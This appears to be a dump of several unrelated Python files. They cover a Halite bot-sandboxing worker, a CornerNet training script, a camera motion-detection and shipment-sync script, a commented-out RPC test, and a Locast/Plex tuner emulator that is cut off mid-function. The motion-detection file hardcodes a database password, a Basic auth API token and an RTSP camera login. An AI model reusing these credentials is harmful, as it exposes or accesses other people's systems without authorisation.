BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory and create files
give_ownership(temp_dir, "bots", 0o2770)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
# Make things group-readable
subprocess.call([
"sudo", "-H", "-u", "bot_compilation", "-s",
"chmod", "-R", "g+r", temp_dir,
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except Exception as e:
logging.error("Bot did not upload", e)
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
compile_dir = bot_dir + '_compile'
try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()]
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
logging.error("Could not compile bot ondemand", e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 775 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2775)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
logging.debug(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
train_ensemble.py
|
#!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
from socket import error as SocketError
import errno
import re
from tqdm import tqdm
from utils import stdout_to_tqdm
from config import system_configs
from nnet.py_factory import NetworkFactory
from azureml.core.run import Run
from torch.multiprocessing import Process, Queue, Pool
from db.datasets import datasets
import time
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("--cfg_file", dest="cfg_file", help="config file", default="CornerNet", type=str)
parser.add_argument("--iter", dest="start_iter", help="train at iteration i", default=0, type=int)
parser.add_argument("--threads", dest="threads", default=1, type=int)
parser.add_argument('--cache_path', dest="cache_path", type=str)
parser.add_argument("--data_dir", dest="data_dir", default="./data", type=str)
parser.add_argument("--split", dest="split", default=0, type=int)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
#print("PRFETCH1",data)
#print("PRFETCH2",ind)
queue.put(data)
except Exception as e:
print('Error while prefetching data!')
traceback.print_exc()
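# pin_memory copies each prefetched batch into page-locked (pinned) host memory,
# which makes the later host-to-GPU transfers faster and allows them to be asynchronous.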
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
try:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
except SocketError as e:
if e.errno != errno.ECONNRESET:
raise
pass
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0, split=0):
learning_rate = system_configs.learning_rate
max_iteration = 50000
#max_iteration = system_configs.max_iter
pretrained_model = None
#pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
val_ind = 0
print("building model...")
nnet = NetworkFactory(training_dbs[0])
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(32)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(32)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
training_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
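# The semaphore now sits at zero; releasing it later (after training) signals the
# pin_memory thread to exit, since that thread polls with a non-blocking acquire().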
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
run = Run.get_context()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
if start_iter == -1:
print("training starts from the latest iteration")
save_list = os.listdir(system_configs.snapshot_dir)
save_list.sort(reverse=True)
if len(save_list) > 0:
target_save = save_list[0]
start_iter = int(re.findall(r'\d+', target_save)[0])
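# Replay the step-wise learning-rate decay schedule up to the resumed iteration.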
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
else:
start_iter = 0
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
if not os.path.exists('./outputs'):
os.makedirs('./outputs')
print('outputs file created')
else:
print(os.listdir('./outputs'))
error_count = 0
for iteration in tqdm(range(start_iter + 1, max_iteration + 1)):
try:
training = pinned_training_queue.get(block=True)
except:
print('Error when extracting data')
error_count += 1
if error_count > 10:
print('failed')
time.sleep(1)
break
continue
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
run.log('train_loss', training_loss.item())
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation, val_ind = sample_data(validation_db, val_ind, data_aug=False)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
run.log('val_loss', validation_loss.item())
nnet.train_mode()
if iteration % 10000 == 0:
split_iter = str(split)+str(iteration)
file = os.path.join(system_configs.snapshot_dir, system_configs.snapshot_name + "_{}.pkl").format(split_iter)
nnet.save_params_split(file)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["data_dir"] = args.data_dir
configs["system"]["cache_dir"] = args.cache_path
file_list_data = os.listdir(args.data_dir)
print(file_list_data)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
print("training_dbs",dir(training_dbs))
print(dataset)
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
split = args.split
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter, split=split)
|
pyi.py
|
import tkinter as tk
import psycopg2
import pickle
import time, calendar, requests, datetime
try:
conn = psycopg2.connect(database="postgres", user="postgres", password="Contec123", host="10.10.100.120")
print("connected")
except psycopg2.Error:
print("unable to connect to the database")
raise # nothing below can work without a connection
motions = []
stationMotions = {}
lastMotion = {}
import cv2
import threading
import schedule
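# maintenance: background loop that roughly every two minutes reads the last
# sync timestamp from the autoid table, pulls new direct-shipment scans from
# the deepblu API for the elapsed window, stores them in directshipping and
# advances the stored timestamp.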
def maintenance():
print("waiting...")
while True:
time.sleep(119)
cur = conn.cursor()
cur.execute("SELECT value FROM autoid WHERE id = 1 LIMIT 1")
autoids = cur.fetchall()
cur.close()
auditval = ''
for autoid in autoids:
last_Date_from = autoid[0].strip().split(' ')
auditval = autoid[0]
last_time = (int(datetime.datetime.strptime(auditval.strip()+',000', "%Y-%m-%d %H:%M:%S,%f").timestamp()))
last_time = last_time + 120
if int(time.time()) > int(last_time):
last_Date_to = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(last_time)))
last_Date_to = last_Date_to.split(' ')
if last_Date_from[0] != last_Date_to[0]:
date_send = last_Date_to[0]
date_from_time = "00:00:00"
date_to_time = last_Date_to[1]
else:
date_send = last_Date_from[0]
date_from_time = last_Date_from[1]
date_to_time = last_Date_to[1]
try:
response = requests.get('https://deepbluapi.gocontec.com/autoreceive/direct-shipments?_format=json&date='+date_send+'&s_time='+date_from_time+'&e_time='+date_to_time+'',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic QVVUT1JFQ0VJVkU6YXV0b0AxMjM='}
)
if response.status_code == 200:
data_time = []
if (response.content.decode("utf-8") != ""):
result = response.json()
s = 0
for value in result:
s = 1
data_time = value["Scan Timestamp"]
cur = conn.cursor()
cur.execute("INSERT INTO directshipping (scantime, station, operator, product, eventtype, shipid, errorcode, errormessage, siteid) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",(value["Scan Timestamp"], value["Work Station ID"], value["Operator ID"], value["Product ID"], value["Event Type"], value["Shipment ID"], value["Error Code"], value["Error Message"], value["Site ID"]))
conn.commit()
cur.close()
upautoidlastValue = date_send +' '+date_to_time
print(upautoidlastValue)
cur = conn.cursor()
cur.execute("UPDATE autoid SET value = %s WHERE id = 1", (upautoidlastValue,))
conn.commit()
cur.close()
except Exception:
print("unable to connect to deepblu")
def job():
print("I'm working...")
cur = conn.cursor()
cur.execute("select * from test_loop(1)")
conn.commit()
cur.close()
schedule.every().day.at("00:05").do(job)
def pendingrun():
while True:
schedule.run_pending()
time.sleep(1)
threading.Thread(target=maintenance, daemon=True).start()
threading.Thread(target=pendingrun, daemon=True).start()
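# capture_motion: records a motion event for a station, but only if the last
# insert for that station is more than 5 seconds old (simple debounce).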
def capture_motion(motion):
ts = int(time.time())
if len(motions) > 0:
if motion not in stationMotions:
stationMotions[motion] = 0
if motion not in lastMotion:
lastMotion[motion] = 0
if stationMotions[motion] < (ts-5):
cur = conn.cursor()
#print("INSERT INTO motions (area, timeadded, warehouse, station_type) VALUES (%s, %s, %s, %s)",(str(motion), ts, 1, 1 ))
cur.execute("INSERT INTO motions (area, timeadded, warehouse, station_type) VALUES (%s, %s, %s, %s)",(str(motion), ts, 1, 1 ))
conn.commit()
cur.close()
#print()
stationMotions[motion] = ts
# define a video capture object
vid = cv2.VideoCapture("rtsp://admin:3J7Bm!j@@10.10.153.21:8221/Streaming/Channels/102/picture?subtype=1")
day1 = 0
while(True):
# Capture the video frame
# by frame
ret, frame = vid.read()
if not ret: # the RTSP stream can drop frames; skip this pass instead of crashing in cv2.resize
continue
frame = cv2.resize(frame, (1100, 700), interpolation=cv2.INTER_AREA)
if day1 == 0:
frame2 = frame
day1 = 1
diff = cv2.absdiff(frame,frame2)
diff_gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(diff_gray, (5, 5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(
dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
movementPoints = []
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 200: # the original "< 200 and > 500" check could never be true; keep only the small-contour noise filter
continue
movementPoints.append([x, y])
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 255, 0), 2)
cv2.putText(frame, "Status: {}".format('Movement'), (20, 30), cv2.FONT_HERSHEY_SIMPLEX,
1, (255, 0, 0), 3)
listStation = pickle.load(open("stationConfig.p", "rb"))
for station in listStation:
arrayassign = []
i = 0
for key in station['location']:
arrayassign.append(station['location'][key])
i = i + 1
i = 0
oldX = 0
oldY = 0
#print(arrayassign)
for key in arrayassign:
if i != 0:
cv2.rectangle(frame, (oldX, oldY),
(key[0], key[1]), (0, 255, 0),
thickness=1)
for point in movementPoints:
#print(station['name'])
#print(str(point[0])+'>'+str(oldX)+' and '+str(point[0])+'>'+str(oldX)+' or '+str(point[1])+'<'+str(key[0])+'and'+str(point[1])+'>'+str(key[1]))
if (point[0] >= oldX and point[1] > oldY) and (point[0] <= key[0] and point[1] < key[1]):
motions.append({station['name']: time.time()})
capture_motion(station['name'])
i = i + 1
oldX = key[0]
oldY = key[1]
ret, frame2 = vid.read()
if ret:
frame2 = cv2.resize(frame2, (1100, 700), interpolation=cv2.INTER_AREA)
else:
frame2 = frame
cv2.imshow("opencv", frame2)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# After the loop release the cap object
vid.release()
# Destroy all the windows
cv2.destroyAllWindows()
|
client_server_test.py
|
# #
# # @rpc.client()
# # class PingClientStub(RPCClient):
# #
# # @rpc.method(PingMessageRequest, PingMessageResponse)
# # def ping(self, ping_message):
# # pass
# #
# # @rpc.server()
# # class PingServer(RPCServer):
# #
# # @rpc.handler(PingMessageRequest, PingMessageResponse)
# # def ping(self, ping_message):
# #
# # return pong_message
# #
# #
# # channel = RPCChannel(host, port)
# # client = RPCClient(channel)
# # client.ping(ping_message)
# #
# #
# # server = RPCServer(port)
# # server.Loop()
#
# import threading
# import time
#
# from proto.message_descriptor import MessageDescriptor
# from proto.field_descriptor import FieldDescriptor
# from proto.field_type import FieldType
# from proto.message import Message
# from proto.serializable import serializable
#
# from proto.rpc._method_descriptor import _MethodDescriptor
# from proto.rpc.server.rpcserver import RpcServer, service, handler
# from proto.rpc.client.rpcchannel import RpcChannel
# from proto.rpc.service.rpcservice_stub import RpcServiceStub
#
# class TestMessageDescriptor(MessageDescriptor):
# def __init__(self):
# super(self.__class__, self).__init__('TestMessage', fields=[
# FieldDescriptor('int1', FieldType.Int8)
# ])
#
# @serializable(TestMessageDescriptor())
# class TestMessage(Message):
# def __init__(self, int1=0):
# self.int1 = int1
#
# @service()
# class TestRpcService(RpcServiceStub):
#
# @handler(TestMessage, None)
# def TestMethod(self):
# pass
#
# def Dispatch(self, method_descriptor, message):
# print '%r' % message.int1
#
# self.Shutdown()
#
# def start_server():
# server = TestRPCServer(port=8081, service=)
# server.loop()
#
# server_thread = threading.Thread(target=start_server)
# server_thread.start()
#
# time.sleep(5)
#
# message = TestMessage(10)
# channel = RPCChannel('localhost', 8081)
# channel.call_method(_MethodDescriptor('TestMethod', message.__class__), message)
#
# server_thread.join()
|
main.py
|
import subprocess, os, sys, random, threading, socket, time, SocketServer
import SSDPServer
import LocastService
from templates import templates
from functools import partial
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from multiprocessing import Process
def clean_exit():
sys.stderr.flush()
sys.stdout.flush()
os._exit(0)
# with help from https://www.acmesystems.it/python_http
# and https://stackoverflow.com/questions/21631799/how-can-i-pass-parameters-to-a-requesthandler
class PlexHttpHandler(BaseHTTPRequestHandler):
# using class variables since this should only be set once
address = ""
port = ""
uuid = ""
templates = {}
station_scan = False
station_list = {}
local_locast = None
def do_GET(self):
base_url = self.address + ':' + self.port
# paths and logic mostly pulled from telly:routes.go: https://github.com/tellytv/telly
if (self.path == '/') or (self.path == '/device.xml'):
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write(self.templates['xmlDiscover'].format(self.uuid, base_url))
elif self.path == '/discover.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
self.wfile.write(self.templates['jsonDiscover'].format(self.uuid, base_url))
elif self.path == '/lineup_status.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
if self.station_scan:
self.wfile.write(self.templates['jsonLineupStatus'])
else:
self.wfile.write(self.templates['jsonLineupComplete'])
elif self.path == '/lineup.json': # TODO
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
returnJSON = ''
for index, station_item in enumerate(self.station_list):
returnJSON = returnJSON + self.templates['jsonLineupItem'].format(station_item['channel'], station_item['name'], base_url + '/watch/' + str(station_item['id']))
if (index + 1) != len(self.station_list):
returnJSON = returnJSON + ','
returnJSON = "[" + returnJSON + "]"
self.wfile.write(returnJSON)
elif self.path == '/lineup.xml': # TODO
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
returnXML = ''
for station_item in self.station_list:
returnXML = returnXML + self.templates['xmlLineupItem'].format(station_item['channel'], station_item['name'], base_url + '/watch/' + str(station_item['id']))
returnXML = "<Lineup>" + returnXML + "</Lineup>"
self.wfile.write(returnXML)
elif self.path.startswith('/watch'):
channelId = self.path.replace('/watch/', '')
channelUri = self.local_locast.get_station_stream_uri(channelId)
self.send_response(200)
self.send_header('Content-type','video/mpeg; codecs="avc1.4D401E"')
self.end_headers()
ffmpeg_proc = subprocess.Popen(["ffmpeg", "-i", channelUri, "-codec", "copy", "-f", "mpegts", "pipe:1"], stdout=subprocess.PIPE)
# get initial videodata. if that works, then keep grabbing it
videoData = ffmpeg_proc.stdout.read(1024000)
while True:
if not videoData:
break
else:
# from https://stackoverflow.com/questions/9932332
try:
self.wfile.write(videoData)
time.sleep(0.1)
except (socket.error):
break
videoData = ffmpeg_proc.stdout.read(1024000)
ffmpeg_proc.terminate()
# elif self.path == '/epg.xml':
# self.send_response(200)
# self.send_header('Content-type','application/xml')
# self.end_headers()
elif self.path == '/debug.json':
self.send_response(200)
self.send_header('Content-type','application/json')
self.end_headers()
else:
print("Unknown request to " + self.path)
self.send_response(501)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(self.templates['htmlError'].format('501 - Not Implemented'))
return
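# do_POST parses the form-encoded body and any query-string parameters, then
# handles the /lineup.post scan commands: scan=start refreshes the station
# list, scan=abort just returns 200, anything else gets a 400.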
def do_POST(self):
contentPath = self.path
queryData = {}
if self.headers.get('Content-Length') != '0':
postdata = self.rfile.read(int(self.headers.get('Content-Length')))
postdataElements = postdata.split('&')
for postdataItem in postdataElements:
postdataItemSplit = postdataItem.split('=')
if len(postdataItemSplit) > 1:
queryData[postdataItemSplit[0]] = postdataItemSplit[1]
if self.path.find('?') != -1:
contentPath = self.path[0:self.path.find('?')]
getdata = self.path[(self.path.find('?') + 1):]
getdataElements = getdata.split('&')
for getdataItem in getdataElements:
getdataItemSplit = getdataItem.split('=')
if len(getdataItemSplit) > 1:
queryData[getdataItemSplit[0]] = getdataItemSplit[1]
if contentPath == '/lineup.post':
if queryData['scan'] == 'start':
self.station_scan = True
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.station_list = locast.get_stations()
self.station_scan = False
elif queryData['scan'] == 'abort':
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
else:
print("Unknown scan command " + queryData['scan'])
self.send_response(400)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(self.templates['htmlError'].format(queryData['scan'] + ' is not a valid scan command'))
else:
print("Unknown request to " + contentPath)
return
# mostly from https://github.com/ZeWaren/python-upnp-ssdp-example
# and https://stackoverflow.com/questions/46210672/python-2-7-streaming-http-server-supporting-multiple-connections-on-one-port
class PlexHttpServer(threading.Thread):
def __init__(self, serverSocket, config, templates, station_list, locast_service):
threading.Thread.__init__(self)
PlexHttpHandler.address = config["host"][0]
PlexHttpHandler.port = config["host"][1]
PlexHttpHandler.uuid = config["uuid"]
PlexHttpHandler.templates = templates
PlexHttpHandler.station_list = station_list
PlexHttpHandler.local_locast = locast_service
self.address = config["listen"][0]
self.port = config["listen"][1]
self.socket = serverSocket
self.daemon = True
self.start()
def run(self):
httpd = HTTPServer((self.address, int(self.port)), PlexHttpHandler, False)
httpd.socket = self.socket
httpd.server_bind = self.server_close = lambda self: None
httpd.serve_forever()
# mostly from https://github.com/ZeWaren/python-upnp-ssdp-example
def ssdpServerProcess(address, port, uuid):
ssdp = SSDPServer.SSDPServer()
ssdp.register('local',
'uuid:' + uuid + '::upnp:rootdevice',
'upnp:rootdevice',
